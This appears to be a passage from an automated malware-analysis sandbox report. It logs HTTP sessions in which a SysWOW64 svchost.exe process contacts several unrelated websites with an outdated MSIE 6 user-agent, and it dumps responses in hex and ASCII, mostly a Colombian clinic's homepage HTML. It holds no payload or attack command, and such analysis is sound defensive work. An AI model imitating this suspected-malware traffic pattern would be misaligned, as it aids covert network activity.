                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1004INData Raw: 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                                                      Data Ascii: tem-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1005INData Raw: 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1006INData Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: enu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-men
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1008INData Raw: 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: .gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup background co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1009INData Raw: 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76
                                                                                                                                                                                                                                                                                                      Data Ascii: //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-ov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1010INData Raw: 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79
                                                                                                                                                                                                                                                                                                      Data Ascii: ).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img sty
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1012INData Raw: 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64 69 63 61 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 34 22 3e 41 67 65
                                                                                                                                                                                                                                                                                                      Data Ascii: "><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-medica" class="button button-4">Age
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1013INData Raw: 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 31 22 3e 0a 3c 69 6d 67 20 73 72 63 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: iv></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-animatedblock-animation-1"><img src=
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1014INData Raw: 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: </div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1016INData Raw: 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65
                                                                                                                                                                                                                                                                                                      Data Ascii: class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1017INData Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                                      Data Ascii: /div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1018INData Raw: 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65
                                                                                                                                                                                                                                                                                                      Data Ascii: a de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Ate
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1020INData Raw: 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-c
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1021INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: -container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1022INData Raw: 34 39 66 0d 0a 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 49fe" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px;
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1023INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      57192.168.2.521176138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC986OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC986INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC986INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      58192.168.2.52108075.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC986OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: ldh.la.gov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC988INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 1346
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC989INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      59192.168.2.521355185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC986OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC987INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
